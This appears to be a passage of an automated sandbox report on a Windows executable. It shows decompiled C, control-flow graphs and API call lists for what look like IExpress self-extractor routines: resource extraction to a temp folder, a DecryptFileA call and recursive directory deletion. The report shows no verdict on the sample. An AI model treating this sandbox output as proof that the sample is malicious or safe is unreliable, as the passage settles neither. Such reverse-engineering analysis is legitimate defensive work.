                                                                      control_flow_graph 374 11d4fe0-11d501a call 11d468f FindResourceA LoadResource LockResource 377 11d5161-11d5163 374->377 378 11d5020-11d5027 374->378 379 11d5029-11d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 11d5057-11d505e call 11d4efd 378->380 379->380 383 11d507c-11d50b4 380->383 384 11d5060-11d5077 call 11d44b9 380->384 389 11d50e8-11d5104 call 11d44b9 383->389 390 11d50b6-11d50da 383->390 388 11d5107-11d510e 384->388 392 11d511d-11d511f 388->392 393 11d5110-11d5117 FreeResource 388->393 402 11d5106 389->402 401 11d50dc 390->401 390->402 394 11d513a-11d5141 392->394 395 11d5121-11d5127 392->395 393->392 399 11d515f 394->399 400 11d5143-11d514a 394->400 395->394 398 11d5129-11d5135 call 11d44b9 395->398 398->394 399->377 400->399 404 11d514c-11d5159 SendMessageA 400->404 405 11d50e3-11d50e6 401->405 402->388 404->399 405->389 405->402
                                                                      C-Code - Quality: 77%
                                                                      			E011D4FE0(void* __edi, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* _t8;
                                                                      				struct HWND__* _t9;
                                                                      				int _t10;
                                                                      				void* _t12;
                                                                      				struct HWND__* _t24;
                                                                      				struct HWND__* _t27;
                                                                      				intOrPtr _t29;
                                                                      				void* _t33;
                                                                      				int _t34;
                                                                      				CHAR* _t36;
                                                                      				int _t37;
                                                                      				intOrPtr _t47;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t36 = "CABINET";
                                                                      				 *0x11d9144 = E011D468F(_t36, 0, 0);
                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                      				 *0x11d9140 = _t8;
                                                                      				if(_t8 == 0) {
                                                                      					return _t8;
                                                                      				}
                                                                      				_t9 =  *0x11d8584; // 0x0
                                                                      				if(_t9 != 0) {
                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                      					ShowWindow(GetDlgItem( *0x11d8584, 0x841), 5);
                                                                      				}
                                                                      				_t10 = E011D4EFD(0, 0);
                                                                      				if(_t10 != 0) {
                                                                      					__imp__#20(E011D4CA0, E011D4CC0, E011D4980, E011D4A50, E011D4AD0, E011D4B60, E011D4BC0, 1, 0x11d9148, _t33);
                                                                      					_t34 = _t10;
                                                                      					if(_t34 == 0) {
                                                                      						L8:
                                                                      						_t29 =  *0x11d9148; // 0x0
                                                                      						_t24 =  *0x11d8584; // 0x0
                                                                      						E011D44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                      						_t37 = 0;
                                                                      						L9:
                                                                      						goto L10;
                                                                      					}
                                                                      					__imp__#22(_t34, "*MEMCAB", 0x11d1140, 0, E011D4CD0, 0, 0x11d9140); // executed
                                                                      					_t37 = _t10;
                                                                      					if(_t37 == 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					__imp__#23(_t34); // executed
                                                                      					if(_t10 != 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L8;
                                                                      				} else {
                                                                      					_t27 =  *0x11d8584; // 0x0
                                                                      					E011D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                      					_t37 = 0;
                                                                      					L10:
                                                                      					_t12 =  *0x11d9140; // 0x0
                                                                      					if(_t12 != 0) {
                                                                      						FreeResource(_t12);
                                                                      						 *0x11d9140 = 0;
                                                                      					}
                                                                      					if(_t37 == 0) {
                                                                      						_t47 =  *0x11d91d8; // 0x0
                                                                      						if(_t47 == 0) {
                                                                      							E011D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                      						}
                                                                      					}
                                                                      					if(( *0x11d8a38 & 0x00000001) == 0 && ( *0x11d9a34 & 0x00000001) == 0) {
                                                                      						SendMessageA( *0x11d8584, 0xfa1, _t37, 0);
                                                                      					}
                                                                      					return _t37;
                                                                      				}
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 011D4FFE
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 011D5006
                                                                      • LockResource.KERNEL32(00000000), ref: 011D500D
                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 011D5030
                                                                      • ShowWindow.USER32(00000000), ref: 011D5037
                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 011D504A
                                                                      • ShowWindow.USER32(00000000), ref: 011D5051
                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 011D5111
                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 011D5159
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                      • String ID: *MEMCAB$CABINET
                                                                      • API String ID: 1305606123-2642027498
                                                                      • Opcode ID: 549d8e3f952dad4b6482ea3232d8e5cf47a3a31f0894fc2e68441a4b894e1429
                                                                      • Instruction ID: 62d888948c51a014d98bd50cc732e4cb10f401e017dc2ae3bfd80c84f4a43943
                                                                      • Opcode Fuzzy Hash: 549d8e3f952dad4b6482ea3232d8e5cf47a3a31f0894fc2e68441a4b894e1429
                                                                      • Instruction Fuzzy Hash: 7531DA717433157BE73C5A76FD89F673B6DAB08759F040038F911A2949D7B89C808754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 406 11d2f1d-11d2f3d 407 11d2f6c-11d2f73 call 11d5164 406->407 408 11d2f3f-11d2f46 406->408 417 11d2f79-11d2f80 call 11d55a0 407->417 418 11d3041 407->418 409 11d2f5f-11d2f66 call 11d3a3f 408->409 410 11d2f48 call 11d51e5 408->410 409->407 409->418 415 11d2f4d-11d2f4f 410->415 415->418 420 11d2f55-11d2f5d 415->420 417->418 425 11d2f86-11d2fbe GetSystemDirectoryA call 11d658a LoadLibraryA 417->425 419 11d3043-11d3053 call 11d6ce0 418->419 420->407 420->409 428 11d2ff7-11d3004 FreeLibrary 425->428 429 11d2fc0-11d2fd4 GetProcAddress 425->429 431 11d3017-11d3024 SetCurrentDirectoryA 428->431 432 11d3006-11d300c 428->432 429->428 430 11d2fd6-11d2fee DecryptFileA 429->430 430->428 441 11d2ff0-11d2ff5 430->441 434 11d3054-11d305a 431->434 435 11d3026-11d303c call 11d44b9 call 11d6285 431->435 432->431 433 11d300e call 11d621e 432->433 445 11d3013-11d3015 433->445 437 11d305c call 11d3b26 434->437 438 11d3065-11d306c 434->438 435->418 447 11d3061-11d3063 437->447 443 11d307c-11d3089 438->443 444 11d306e-11d3075 call 11d256d 438->444 441->428 449 11d308b-11d3091 443->449 450 11d30a1-11d30a9 443->450 455 11d307a 444->455 445->418 445->431 447->418 447->438 449->450 456 11d3093 call 11d3ba2 449->456 453 11d30ab-11d30ad 450->453 454 11d30b4-11d30b7 450->454 453->454 458 11d30af call 11d4169 453->458 454->419 455->443 459 11d3098-11d309a 456->459 458->454 459->418 461 11d309c 459->461 461->450
                                                                      C-Code - Quality: 82%
                                                                      			E011D2F1D(void* __ecx, int __edx) {
                                                                      				signed int _v8;
                                                                      				char _v272;
                                                                      				_Unknown_base(*)()* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t9;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				void* _t14;
                                                                      				int _t21;
                                                                      				signed int _t22;
                                                                      				signed int _t25;
                                                                      				intOrPtr* _t26;
                                                                      				signed int _t27;
                                                                      				void* _t30;
                                                                      				_Unknown_base(*)()* _t31;
                                                                      				void* _t34;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr _t41;
                                                                      				intOrPtr* _t44;
                                                                      				signed int _t46;
                                                                      				int _t47;
                                                                      				void* _t58;
                                                                      				void* _t59;
                                                                      
                                                                      				_t43 = __edx;
                                                                      				_t9 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t9 ^ _t46;
                                                                      				if( *0x11d8a38 != 0) {
                                                                      					L5:
                                                                      					_t11 = E011D5164(_t52);
                                                                      					_t53 = _t11;
                                                                      					if(_t11 == 0) {
                                                                      						L16:
                                                                      						_t12 = 0;
                                                                      						L17:
                                                                      						return E011D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                      					}
                                                                      					_t14 = E011D55A0(_t53); // executed
                                                                      					if(_t14 == 0) {
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t45 = 0x105;
                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                      						_t43 = 0x105;
                                                                      						_t40 =  &_v272;
                                                                      						E011D658A( &_v272, 0x105, "advapi32.dll");
                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                      						_t44 = 0;
                                                                      						if(_t36 != 0) {
                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                      							_v276 = _t31;
                                                                      							if(_t31 != 0) {
                                                                      								_t45 = _t47;
                                                                      								_t40 = _t31;
                                                                      								 *0x11da288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                      								_v276();
                                                                      								if(_t47 != _t47) {
                                                                      									_t40 = 4;
                                                                      									asm("int 0x29");
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						FreeLibrary(_t36);
                                                                      						_t58 =  *0x11d8a24 - _t44; // 0x0
                                                                      						if(_t58 != 0) {
                                                                      							L14:
                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                      							if(_t21 != 0) {
                                                                      								__eflags =  *0x11d8a2c - _t44; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									L20:
                                                                      									__eflags =  *0x11d8d48 & 0x000000c0;
                                                                      									if(( *0x11d8d48 & 0x000000c0) == 0) {
                                                                      										_t41 =  *0x11d9a40; // 0x3, executed
                                                                      										_t26 = E011D256D(_t41); // executed
                                                                      										_t44 = _t26;
                                                                      									}
                                                                      									_t22 =  *0x11d8a24; // 0x0
                                                                      									 *0x11d9a44 = _t44;
                                                                      									__eflags = _t22;
                                                                      									if(_t22 != 0) {
                                                                      										L26:
                                                                      										__eflags =  *0x11d8a38;
                                                                      										if( *0x11d8a38 == 0) {
                                                                      											__eflags = _t22;
                                                                      											if(__eflags == 0) {
                                                                      												E011D4169(__eflags);
                                                                      											}
                                                                      										}
                                                                      										_t12 = 1;
                                                                      										goto L17;
                                                                      									} else {
                                                                      										__eflags =  *0x11d9a30 - _t22; // 0x0
                                                                      										if(__eflags != 0) {
                                                                      											goto L26;
                                                                      										}
                                                                      										_t25 = E011D3BA2(); // executed
                                                                      										__eflags = _t25;
                                                                      										if(_t25 == 0) {
                                                                      											goto L16;
                                                                      										}
                                                                      										_t22 =  *0x11d8a24; // 0x0
                                                                      										goto L26;
                                                                      									}
                                                                      								}
                                                                      								_t27 = E011D3B26(_t40, _t44);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      								goto L20;
                                                                      							}
                                                                      							_t43 = 0x4bc;
                                                                      							E011D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                      							 *0x11d9124 = E011D6285();
                                                                      							goto L16;
                                                                      						}
                                                                      						_t59 =  *0x11d9a30 - _t44; // 0x0
                                                                      						if(_t59 != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						_t30 = E011D621E(); // executed
                                                                      						if(_t30 == 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      				_t49 =  *0x11d8a24;
                                                                      				if( *0x11d8a24 != 0) {
                                                                      					L4:
                                                                      					_t34 = E011D3A3F(_t51);
                                                                      					_t52 = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      				if(E011D51E5(_t49) == 0) {
                                                                      					goto L16;
                                                                      				}
                                                                      				_t51 =  *0x11d8a38;
                                                                      				if( *0x11d8a38 != 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				goto L4;
                                                                      			}





























                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D2F93
                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 011D2FB2
                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 011D2FC6
                                                                      • DecryptFileA.ADVAPI32 ref: 011D2FE6
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 011D2FF8
                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D301C
                                                                        • Part of subcall function 011D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,011D2F4D,?,00000002,00000000), ref: 011D5201
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                      • API String ID: 2126469477-58291647
                                                                      • Opcode ID: 11bc5364339b7d96582c4d2fb9ca56b57fca66e7146391941190a7d15ad5fea2
                                                                      • Instruction ID: 1b9fea424e377816ac01b397903ee3a882a572e15f5c43d1b7072dcdcafb6764
                                                                      • Opcode Fuzzy Hash: 11bc5364339b7d96582c4d2fb9ca56b57fca66e7146391941190a7d15ad5fea2
                                                                      • Instruction Fuzzy Hash: F641F771A132169ADB3DAB79AC44B6A37A8FF54758F000179D971C2185EB74C9C0CB63
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 478 11d5467-11d5484 479 11d551c-11d5528 call 11d1680 478->479 480 11d548a-11d5490 call 11d53a1 478->480 484 11d552d-11d5539 call 11d58c8 479->484 483 11d5495-11d5497 480->483 485 11d549d-11d54c0 call 11d1781 483->485 486 11d5581-11d5583 483->486 493 11d554d-11d5552 484->493 494 11d553b-11d5545 CreateDirectoryA 484->494 497 11d550c-11d551a call 11d658a 485->497 498 11d54c2-11d54d8 GetSystemInfo 485->498 489 11d558d-11d559d call 11d6ce0 486->489 495 11d5585-11d558b 493->495 496 11d5554-11d5557 call 11d597d 493->496 500 11d5577-11d557c call 11d6285 494->500 501 11d5547 494->501 495->489 507 11d555c-11d555e 496->507 497->484 505 11d54fe 498->505 506 11d54da-11d54dd 498->506 500->486 501->493 508 11d5503-11d5507 call 11d658a 505->508 511 11d54df-11d54e2 506->511 512 11d54f7-11d54fc 506->512 507->495 513 11d5560-11d5566 507->513 508->497 515 11d54e4-11d54e7 511->515 516 11d54f0-11d54f5 511->516 512->508 513->486 518 11d5568-11d5575 RemoveDirectoryA 513->518 515->497 517 11d54e9-11d54ee 515->517 516->508 517->508 518->486
                                                                      C-Code - Quality: 75%
                                                                      			E011D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _SYSTEM_INFO _v304;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t10;
                                                                      				void* _t13;
                                                                      				intOrPtr _t14;
                                                                      				void* _t16;
                                                                      				void* _t20;
                                                                      				signed int _t26;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				CHAR* _t48;
                                                                      				signed int _t49;
                                                                      				intOrPtr _t61;
                                                                      
                                                                      				_t10 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t10 ^ _t49;
                                                                      				_push(__ecx);
                                                                      				if(__edx == 0) {
                                                                      					_t48 = 0x11d91e4;
                                                                      					_t42 = 0x104;
                                                                      					E011D1680(0x11d91e4, 0x104);
                                                                      					L14:
                                                                      					_t13 = E011D58C8(_t48); // executed
                                                                      					if(_t13 != 0) {
                                                                      						L17:
                                                                      						_t42 = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							L23:
                                                                      							 *0x11d9124 = 0;
                                                                      							_t14 = 1;
                                                                      							L24:
                                                                      							return E011D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                      						}
                                                                      						_t16 = E011D597D(_t48, _t42, 1, 0); // executed
                                                                      						if(_t16 != 0) {
                                                                      							goto L23;
                                                                      						}
                                                                      						_t61 =  *0x11d8a20; // 0x0
                                                                      						if(_t61 != 0) {
                                                                      							 *0x11d8a20 = 0;
                                                                      							RemoveDirectoryA(_t48);
                                                                      						}
                                                                      						L22:
                                                                      						_t14 = 0;
                                                                      						goto L24;
                                                                      					}
                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                      						 *0x11d9124 = E011D6285();
                                                                      						goto L22;
                                                                      					}
                                                                      					 *0x11d8a20 = 1;
                                                                      					goto L17;
                                                                      				}
                                                                      				_t42 =  &_v268;
                                                                      				_t20 = E011D53A1(__ecx,  &_v268); // executed
                                                                      				if(_t20 == 0) {
                                                                      					goto L22;
                                                                      				}
                                                                      				_push(__ecx);
                                                                      				_t48 = 0x11d91e4;
                                                                      				E011D1781(0x11d91e4, 0x104, __ecx,  &_v268);
                                                                      				if(( *0x11d9a34 & 0x00000020) == 0) {
                                                                      					L12:
                                                                      					_t42 = 0x104;
                                                                      					E011D658A(_t48, 0x104, 0x11d1140);
                                                                      					goto L14;
                                                                      				}
                                                                      				GetSystemInfo( &_v304);
                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                      				if(_t26 == 0) {
                                                                      					_push("i386");
                                                                      					L11:
                                                                      					E011D658A(_t48, 0x104);
                                                                      					goto L12;
                                                                      				}
                                                                      				_t28 = _t26 - 1;
                                                                      				if(_t28 == 0) {
                                                                      					_push("mips");
                                                                      					goto L11;
                                                                      				}
                                                                      				_t29 = _t28 - 1;
                                                                      				if(_t29 == 0) {
                                                                      					_push("alpha");
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t29 != 1) {
                                                                      					goto L12;
                                                                      				}
                                                                      				_push("ppc");
                                                                      				goto L11;
                                                                      			}

                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D54C9
                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D553D
                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D556F
                                                                        • Part of subcall function 011D53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D53FB
                                                                        • Part of subcall function 011D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5402
                                                                        • Part of subcall function 011D53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D541F
                                                                        • Part of subcall function 011D53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D542B
                                                                        • Part of subcall function 011D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5434
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                      • API String ID: 1979080616-186922987
                                                                      • Opcode ID: e1fab79cd94162263e3e5ad21b1dfed8bffedec25706d9d0603a51364773b085
                                                                      • Instruction ID: 07b3003909719bb01392a76ae3c732507c14ffc67a1ad823ace9feea3380c0de
                                                                      • Opcode Fuzzy Hash: e1fab79cd94162263e3e5ad21b1dfed8bffedec25706d9d0603a51364773b085
                                                                      • Instruction Fuzzy Hash: C2314771B02225ABDB6D9E3D9C44A7F7BBBAB91254B84013AE902C2144DF74CA41C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E011D2390(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				char _v284;
                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t21;
                                                                      				int _t36;
                                                                      				void* _t46;
                                                                      				void* _t62;
                                                                      				void* _t63;
                                                                      				CHAR* _t65;
                                                                      				void* _t66;
                                                                      				signed int _t67;
                                                                      				signed int _t69;
                                                                      
                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                      				_t21 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t22 = _t21 ^ _t69;
                                                                      				_v8 = _t21 ^ _t69;
                                                                      				_t65 = __ecx;
                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                      					L10:
                                                                      					_pop(_t62);
                                                                      					_pop(_t66);
                                                                      					_pop(_t46);
                                                                      					return E011D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                      				} else {
                                                                      					E011D1680( &_v276, 0x104, __ecx);
                                                                      					_t58 = 0x104;
                                                                      					E011D16B3( &_v280, 0x104, "*");
                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                      					_t63 = _t22;
                                                                      					if(_t63 == 0xffffffff) {
                                                                      						goto L10;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      					do {
                                                                      						L3:
                                                                      						_t58 = 0x104;
                                                                      						E011D1680( &_v276, 0x104, _t65);
                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                      							_t58 = 0x104;
                                                                      							E011D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                      							DeleteFileA( &_v280);
                                                                      						} else {
                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                      								E011D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                      								_t58 = 0x104;
                                                                      								E011D658A( &_v280, 0x104, 0x11d1140);
                                                                      								E011D2390( &_v284);
                                                                      							}
                                                                      						}
                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                      					} while (_t36 != 0);
                                                                      					FindClose(_t63); // executed
                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                      					goto L10;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(?,011D8A3A,011D11F4,011D8A3A,00000000,?,?), ref: 011D23F6
                                                                      • lstrcmpA.KERNEL32(?,011D11F8), ref: 011D2427
                                                                      • lstrcmpA.KERNEL32(?,011D11FC), ref: 011D243B
                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 011D2495
                                                                      • DeleteFileA.KERNEL32(?), ref: 011D24A3
                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 011D24AF
                                                                      • FindClose.KERNELBASE(00000000), ref: 011D24BE
                                                                      • RemoveDirectoryA.KERNELBASE(011D8A3A), ref: 011D24C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 836429354-0
                                                                      • Opcode ID: 72abc052bb161d9775e73370d3c70ff317a218e7de1d30072bc92eeca8c9ac80
                                                                      • Instruction ID: ce6f304be6a0ceeb7648285ed18c4367c00103b99f6a262edd4b35c773a3464b
                                                                      • Opcode Fuzzy Hash: 72abc052bb161d9775e73370d3c70ff317a218e7de1d30072bc92eeca8c9ac80
                                                                      • Instruction Fuzzy Hash: 3D31B332605741ABD338EBB8DD88AEB77ECAFD4309F04493DA96583280EF749549C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E011D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				long _t4;
                                                                      				void* _t6;
                                                                      				intOrPtr _t7;
                                                                      				void* _t9;
                                                                      				struct HINSTANCE__* _t12;
                                                                      				intOrPtr* _t17;
                                                                      				signed char _t19;
                                                                      				intOrPtr* _t21;
                                                                      				void* _t22;
                                                                      				void* _t24;
                                                                      				intOrPtr _t32;
                                                                      
                                                                      				_t4 = GetVersion();
                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                      					if(_t12 != 0) {
                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                      						if(_t21 != 0) {
                                                                      							_t17 = _t21;
                                                                      							 *0x11da288(0, 1, 0, 0);
                                                                      							 *_t21();
                                                                      							_t29 = _t24 - _t24;
                                                                      							if(_t24 != _t24) {
                                                                      								_t17 = 4;
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t20 = _a12;
                                                                      				_t18 = _a4;
                                                                      				 *0x11d9124 = 0;
                                                                      				if(E011D2CAA(_a4, _a12, _t29, _t17) != 0) {
